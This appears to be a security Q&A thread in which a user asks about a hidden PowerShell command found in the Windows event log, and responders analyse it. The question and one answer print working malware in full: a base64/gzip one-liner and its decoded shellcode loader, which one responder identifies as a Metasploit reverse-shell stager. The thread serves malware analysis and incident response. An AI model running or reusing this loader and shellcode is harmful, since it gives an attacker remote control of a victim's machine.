6

While I was sitting in front of the computer not using it,my Windows 10 machine quickly flashed a few terminal windows, and then gave me a Windows Security popup, asking for my password.

I have no idea what this is for, so I did a little poking around in the file explorer and the Event log, and found a whole series of entries for PowerShell with the following data:

HostApplication=powershell.exe -nop -w hidden -c $s=New-Object IO.MemoryStream(,
[Convert]::FromBase64String(
'H4sIAEy98VUCA7VWbW+bSBD+nEr9D6iyBKiOjRO3TSNVOsAQ4zOOKTaO7VonDAusvbwE1rFxr//9BhsS99pU6UmHkNiXmZ1nnpnZwdtEDsVxxNALfcV8ff3qbGindshwtcBKrSvpwpus6kxt793eJ8Mr/uwMJGphL8qzeGcO75hPDDcXk6QThzaOFtfX8iZNUUSP88YNomKWoXBJMMo4nvmbmQQoRee3yxVyKPOVqf3VuCHx0ialWC7bToCYczFyi71+7NgFuoaZEEw59ssXlp+ftxYN5X5jk4xjzTyjKGy4hLA8840vDI7yBHGsjp00zmKPNiY4urxojKPM9tAATntAOqJB7GYsD77AmyK6SSPmxKvimKMQx8JwmMaO6LopykCnoUUP8RpxtWhDSJ35g5uXGD5vIopDBPsUpXFiovQBOyhrdO3IJegz8hbcAG0r11+qxJ0qgdSQpnwdovMsWD12NwQd9Vn+R7gnceXhOYkt0PHt9avXr7wqJVatm6uHbTb0T/MCRmfzwxgBZG4YZ/gg/IkR6owOZm0apzlMa6N0g/gFMy8CMl8smFqWZn/11frzJ7QqcRAmIz1Z9S/1Yn1uxdhdgF4ZsdpSSO6L9eczr4M8HKFOHtkhdqrk4n4WAeQRdPC3UYkNABnHlhvI7SCCfJsWbNaZ+Y9qSojpo660wcRFqehAFDNABQHmvwdzDBDHapGOQqDqOGchEB6kNKqkyzTOK+vFHIRYmdhZVmeGG6gpp86YyCbIrTNilOFyS9zQ+DBkn+DqG0KxY2e0Om7BVzyW9uQ4ymi6cSB64PvITJCDbVJQUWe62EVSbmK/ssv+lAjZJgRHPpz0AIGAlYIAkxY5kQLEMv58w0RUCxOCQpA6lLdKbB+KuSyGQxrZPnLZf2Os0vyY0wUbFQ0nCCHEJolpnbFwSuGWKJh9TKb/iuLkmjjgkVNUxoSrymYu5bTI89rWv729JEV6lhQdCEkpkKGmcSjZGXrfNmkKVHFvmgruvBt24r0Ij6J+NizJHFszTXd7xNSoOVVwfxwEGm5pPszzseIPqZD8ORp1e2anK6adXeCJWqYpXSk3WpLodPEHqyeNx6CH5b6x2mmiK4X+nT+Vt9owuNPAkNz3NR++khY4kjATfElQ5b4pBQoWRN80uka7NdOaV0TCe1Mzxe7k0d6jHaXd7t7tRuJA74mBeuuqrQv1oL8u9Gfrm35HOcydYm5MMwUrYEdRp4YVoImVSBNFnRlWovlvt75h9ZttNZBgXcO7fmI24Wm1eg+Ru9fJ1V4HuIY162E003yU+6IhiuY0IuZyK4M/PTnzkaKoY1hbj7RoZywT3c2n3eZHS8coiUVDEUWVQHmGor3tNFuTWDWsd8ZYEXb5WNhtlVVzq+Dedl1+xzfv3/tNrz1sWqYWde1AArx5r73GvbewF9qWMPWaVsFfR4ma++iO2EO5FZNlszXGnQ+SpGHUG+gOuZfAZzjjnbGM5Qsn8ACT5l8Z/t06WH0ME/CLxKJ0iH8hlwPPPcA/TdQhKWSxM+hhxy3O6mEPznWBIw988fuzXAWaxr60Ffxkt8bqx+guMLxm9KbIWkjb2n7dIuH+JBufazm6nWaBTSBLoYtU14Qap2rZDoYxLjQ47vCnsEZphAg0Vmi9VaWJhMRO0Z2eGge0x2PTWsCNMYbh5cVPRzzzKMg/Na1q6fp6BlChdo+l1eijyKdBXdhdCgJ0HWHXFsDdlzsox0nOlYfVi75VsvRkgRws8EVd12I16d5Mwo7+/5JYXikBfNwXkfi09ovdFxEr1CsCftj4fuG3WP5tBiY2piBpwsVI0LFL/4KIMnFOfnEeAwWZ4ZVP8c95u6HnA/j9+QfZGsmx7AoAAA=='
));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,
[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

The base64 string decodes to one starting with a valid gzip header (hex 1F 8B 08 ...) I tried unzipping that on my Mac, but ran into an error.

Does anyone have an idea what this is, and is there any chance it is legitimate?

Update : The infected machine is a Win 10 host running in VirtualBox on Mac. Is there any chance the Mac host can be infected? I am assuming that this is something that virtualization prevents, but exploits are always evolving...

AShelly
  • 173
  • 1
  • 7
  • 3
    Reinstall your machine as soon as possible, this is definitely malicious. – André Borie Sep 11 '15 at 14:15
  • The update is arguably a different question, but for the record: it depends whether the VM has access to the host. VMs *can* be completely isolated, and in that case you're safe (barring the occasional, rare-but-very-exciting bug in the virtualization). However, most people who use a VM for convenience rather than security allow the VM to access the host's file system and so on. In that case, the VM can (though not necessarily will) infect the host. – CBHacking Jun 22 '16 at 16:52
  • Possible duplicate of [How do I deal with a compromised server?](http://security.stackexchange.com/questions/39231/how-do-i-deal-with-a-compromised-server) – André Borie Jul 18 '16 at 13:50
  • @AndréBorie As I read the question, it asks "Am I infected?", not "What do I do if I am infected?" So I would say not a duplicate. – Anders Jul 18 '16 at 14:17

4 Answers4

11

It decompresses just fine for me... I converted the Base64 string into binary, then ran gunzip on it (I am using a Linux system here). This results in another piece of PowerShell that does things which can only be considered as definitely fishy. It contains a piece of 450 bytes, that it loads into (native) RAM, and runs as code. I am way too lazy to disassemble the piece of code, but I feel pretty safe when I say that this piece of code is not safe at all.

Looks likes there is some malware in your machine, that tries to gain some privileges. It's time for some nuking, I'd say.

Tom Leek
  • 170,038
  • 29
  • 342
  • 480
6

Posting this in an answer, because it's too big for a comment: I don't know what it does (though it does look sketchy) but here's the expansion. It's a PS script itself, of course:

function t2Mj {
    Param ($hVrV8B2fWj, $zfOqpP8)                
    $mJnysoxSPX = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

    return $mJnysoxSPX.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($mJnysoxSPX.GetMethod('GetModuleHandle')).Invoke($null, @($hVrV8B2fWj)))), $zfOqpP8))
}

function j1G8vwsPg {
    Param (
            [Parameter(Position = 0, Mandatory = $True)] [Type[]] $srs_LF,
            [Parameter(Position = 1)] [Type] $lTMpjL3Mn = [Void]
    )

    $b0pq = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
    $b0pq.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $srs_LF).SetImplementationFlags('Runtime, Managed')
    $b0pq.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $lTMpjL3Mn, $srs_LF).SetImplementationFlags('Runtime, Managed')

    return $b0pq.CreateType()
}

[Byte[]]$wgOO3l = [System.Convert]::FromBase64String("/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAACJCsgeEEFUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoFQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0DEn/znXlaPC1olb/1UiD7BBIieJNMclqBEFYSIn5QboC2chf/9VIg8QgXkhj9mpAQVloABAAAEFYSInySDHJQbpYpFPl/9VIicNJicdNMclJifBIidpIiflBugLZyF//1UgBw0gpxkiF9nXhQf/n")

$zk1lmz = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll VirtualAlloc), (j1G8vwsPg @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $wgOO3l.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($wgOO3l, 0, $zk1lmz, $wgOO3l.length)

$oFpHGWmDM = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll CreateThread), (j1G8vwsPg @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$zk1lmz,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((t2Mj kernel32.dll WaitForSingleObject), (j1G8vwsPg @([IntPtr], [Int32]))).Invoke($oFpHGWmDM,0xffffffff) | Out-Null

Definitely looks questionable. I don't recognize it, though.

CBHacking
  • 42,359
  • 3
  • 76
  • 107
  • 1
    Thanks for this. I did a little formatting and renaming, and came to the same conclusion as @Tom Leek. It is allocating and filling memory with the contents of the decoded base64 blob, and marking that memory as executable. It is calling CreateThread and giving it that address, then waiting for the thread to finish. – AShelly Sep 10 '15 at 21:19
  • 1
    The Blob dissasembles into this: https://www.onlinedisassembler.com/odaweb/Ralv0gEB/0. It contains the string "AQARPQVH1" which [Google only finds on Malware analysis pages](https://www.google.com/search?q=AQAPRQVH1). It's not looking good. – AShelly Sep 10 '15 at 21:47
1

I had a machine with two similar registry entries.

I tried the following scanners to see if they would pick up the dodgy script in the registry and none of these picked them up at time of writing: AVG, Kapersky tdsskiller, rKill, Malwarebytes, hitmanpro, Zemana Antimalware, adware cleaner, Junkware Removal Tool, Emisoft, Hijackthis, UsbFix, CCleaner and Smadav.

The ones I haven't tried yet are RogueKiller and Symantec's scanner, both of these had articles or mentions of this "Powerworm" or powershell kind of behaviour. Eitherway, it's a very clever way to hide malware on the machine as most scanners are just missing this method of hiding in the registry.

0

This is metasploit meterpreter shell trying a reverse tcp, basically injecting a service (dll) into a process and getting shell.